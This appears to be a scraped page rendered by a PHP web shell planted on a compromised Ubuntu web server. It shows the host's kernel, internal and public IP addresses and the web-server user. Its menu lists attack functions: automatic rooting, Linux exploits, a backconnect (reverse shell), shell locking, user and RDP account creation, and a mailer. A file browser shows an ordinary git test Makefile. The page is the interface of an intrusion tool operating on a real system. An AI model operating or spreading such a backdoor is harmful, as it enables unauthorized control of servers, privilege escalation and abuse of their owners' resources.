Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.188.159.66
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
git /
contrib /
diff-highlight /
t /
[ HOME SHELL ]
Name
Size
Permission
Action
Makefile
482
B
-rw-r--r--
t9400-diff-highlight.sh
5.56
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Makefile
-include ../../../config.mak.autogen -include ../../../config.mak # copied from ../../t/Makefile SHELL_PATH ?= $(SHELL) SHELL_PATH_SQ = $(subst ','\'',$(SHELL_PATH)) T = $(wildcard t[0-9][0-9][0-9][0-9]-*.sh) all: test test: $(T) .PHONY: help clean all test $(T) help: @echo 'Run "$(MAKE) test" to launch test scripts' @echo 'Run "$(MAKE) clean" to remove trash folders' $(T): @echo "*** $@ ***"; '$(SHELL_PATH_SQ)' $@ $(GIT_TEST_OPTS) clean: $(RM) -r 'trash directory'.*
Close